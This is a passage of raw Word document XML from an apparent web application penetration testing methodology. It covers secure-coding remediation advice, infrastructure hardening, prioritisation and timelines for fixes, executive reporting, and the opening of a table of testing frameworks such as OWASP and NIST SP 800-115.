              <w:t xml:space="preserve"> $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>stmt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = $conn-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>prepare(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'SELECT * FROM users WHERE username = ?');</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> - For web vulnerabilities like </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, suggest </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>content security policies (CSP)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>output encoding</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> methods with direct examples of secure code. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22BCF314" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security Hardening Advice</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Instead of just fixing individual vulnerabilities, you give broader </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>infrastructure hardening recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: for instance, using </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>multi-factor authentication (MFA)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, proper </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>logging and monitoring practices</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>regular vulnerability assessments</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Priority of Fixes</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Use a risk-based approach to recommend a priority for fixes. For example, start with critical vulnerabilities like remote code execution or SQL Injection and leave low-severity issues, like clickjacking, for last. Explain how certain risks (e.g., privilege escalation) might be a higher priority even if the CVSS score is lower, based on the system’s role. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C60A27" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Executive Summary Section</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Risk Assessment</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Summarize the overall </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>business risk</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. Focus on the potential </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>financial impact</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reputation damage</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>regulatory compliance issues</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> if these vulnerabilities were exploited. Senior stakeholders are typically concerned with “what could happen” rather than technical specifics, so translate the technical jargon into </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>business risk language</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5980435F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Findings Overview</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Provide a high-level summary of the top 5-10 critical findings and their potential impact. Use simple metrics like “Critical SQL Injection vulnerability may expose customer data, leading to GDPR fines of up to €20 million.” This immediately catches the attention of decision-makers. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A57F1C" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security Posture Improvement Suggestions</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Highlight key areas where security could be improved on a strategic level, such as </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>creating a security awareness program</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>performing regular penetration tests</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>implementing a secure development lifecycle (SDLC)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700A28B7" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cost of Mitigation</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Where relevant, discuss potential mitigation costs and suggest budget-friendly approaches, such as using </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>open-source security tools</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ModSecurity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for web application firewalls, or leveraging </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>existing solutions</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> the client may already have but aren’t using fully. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C8E2A0" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Timeline for Fixes</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Suggest a timeline for remediation based on the severity of vulnerabilities and resource availability. For example, recommend patching all critical vulnerabilities within </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>30 days</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> while addressing lower-risk issues in the next </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>60-90 days</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">.  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Final Deliverables</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: - A professional penetration test report broken down into </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technical Findings</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Narrative</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, and</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45AAEE90" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remediation Sessions</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Offer to conduct workshops or training sessions with the client’s development or IT teams to go over the findings, assist with remediation efforts, and ensure they understand how to prevent future attacks. Also, suggest running a </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>post-remediation validation test</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to ensure all issues were successfully fixed. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="498EED5E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00871A44" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Actionable Roadmap</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Provide an actionable roadmap for the client’s long-term security posture, including guidance on </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hardening protocols</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>patch management</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, and recommendations for future security tests, such as </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>red team assessments</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>social engineering</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> campaigns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D645B0D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="testing-frameworks-standards"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="5E05B14D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc178498980"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Testing Frameworks &amp; Standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="1B6FBDED" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Our web application VAPT assessment follows industry-standard methodologies and guidelines such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NIST SP 800-115</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t>. The approach ensures a structured, repeatable, and thorough process, designed to identify vulnerabilities that could be exploited by malicious attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5F69B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00871A44" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2439"/>
        <w:gridCol w:w="6921"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0BA5" w14:paraId="009A9217" w14:textId="77777777" w:rsidTr="00211D1D">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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3362530E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Framework/Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E190325" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="19611F7A" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="44E32232" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OWASP Testing Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
